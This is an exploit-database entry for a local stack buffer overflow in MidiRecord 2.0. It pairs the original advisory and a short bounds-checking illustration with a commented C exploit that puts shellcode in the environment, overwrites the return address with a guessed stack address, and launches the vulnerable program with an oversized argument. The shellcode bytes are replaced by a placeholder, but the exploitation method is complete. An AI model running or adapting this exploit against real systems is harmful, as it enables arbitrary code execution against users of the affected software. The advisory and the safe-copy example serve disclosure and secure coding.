MidiRecord2 MidiRecord.CC - Local Buffer Overflow

Type exploitpack
Reporter Dedi Dwianto
Modified 2006-07-27T00:00:00



Source: https://www.securityfocus.com/bid/19190/info

MidiRecord is prone to a local buffer-overflow vulnerability because it fails to perform proper bounds checking on user-supplied data before copying it into a fixed-size buffer.

An attacker can exploit this issue to execute arbitrary code in the context of the victim running the affected application. 

Version 2.0 is vulnerable to this issue; other versions may also be affected.
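As an added illustration (not MidiRecord's source, which the advisory does not include), the bug class described above reduced to a hypothetical argument-copy routine: an unchecked strcpy of a command-line device path into a fixed stack buffer beside a length-checked version that rejects anything that would not fit. PATH_MAX_LEN, the function names and the 512-byte test helper are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define PATH_MAX_LEN 64   /* constructed size; the real buffer size is not stated */

/* The pattern the advisory describes: strcpy never consults the destination
 * size, so an argument of PATH_MAX_LEN bytes or longer writes past 'dest'.
 * Kept for contrast only; nothing below calls it. */
void copy_path_unchecked(char *dest, const char *src) { strcpy(dest, src); }

/* Bounds-checked replacement: refuse input that would not fit together with
 * its NUL terminator. Returns 0 on success, -1 when the input is rejected. */
int copy_path_checked(char *dest, size_t dest_len, const char *src)
{
        size_t n = strlen(src);
        if (dest_len == 0 || n >= dest_len)
                return -1;            /* would overflow: reject, never truncate silently */
        memcpy(dest, src, n + 1);     /* n + 1 copies the terminator as well */
        return 0;
}

/* How a tool taking a device path on its command line would use the check. */
int open_device_path(const char *arg)
{
        char path[PATH_MAX_LEN];
        if (copy_path_checked(path, sizeof path, arg) != 0) {
                fprintf(stderr, "device path too long (max %zu bytes)\n", sizeof path - 1);
                return -1;
        }
        /* open(path, ...) would follow here */
        return 0;
}

/* Test helper: submits a constructed path of n 'A' characters. */
int try_path_of_length(size_t n)
{
        char src[512];
        if (n >= sizeof src)
                return -2;
        memset(src, 'A', n);
        src[n] = '\0';
        return open_device_path(src);
}

int main(void)
{
        printf("/dev/midi1 -> %d, 200 x 'A' -> %d\n",
               open_device_path("/dev/midi1"), try_path_of_length(200));
        return 0;
}
```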

/* Successful Exploit in Ubuntu Breezey */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 225          /* length of the oversized argument */
#define ALIGNMENT 1          /* one pad byte so the stored addresses are 4-byte aligned */

int main(int argc, char **argv)
{
        /* The shellcode bytes are missing from this copy of the post; a
         * labelled placeholder stands in for them so that the file compiles. */
        char shellcode[] = "SHELLCODE_OMITTED_FROM_ORIGINAL";

        if (argc < 2) {
                fprintf(stderr, "Use : %s <path_to_vuln>\n", argv[0]);
                return 0;
        }

        /* The shellcode is passed as the only environment string, so it sits
         * near the top of the new process's stack at a predictable address. */
        char *env[] = {shellcode, NULL};
        char buf[BUFSIZE + 1];          /* +1 leaves room for the terminating NUL */
        int i;
        int *ap = (int *)(buf + ALIGNMENT);
        /* Guessed address of the shellcode string on a 32-bit Linux stack:
         * stack top 0xbffffffa minus the program path and the shellcode length. */
        int ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);

        memset(buf, 'A', sizeof buf);   /* pad byte(s) get a non-NUL filler */
        /* Fill the argument with repeated copies of the guessed address */
        for (i = 0; i < BUFSIZE - 4; i += 4)
                *ap++ = ret;
        buf[BUFSIZE] = '\0';

        /* Run the vulnerable program: its argv[0] becomes "/dev/midi1", its
         * first argument is the oversized buffer, and env carries the shellcode. */
        execle(argv[1], "/dev/midi1", buf, NULL, env);
        perror("execle");               /* only reached if the exec fails */
        return 1;
}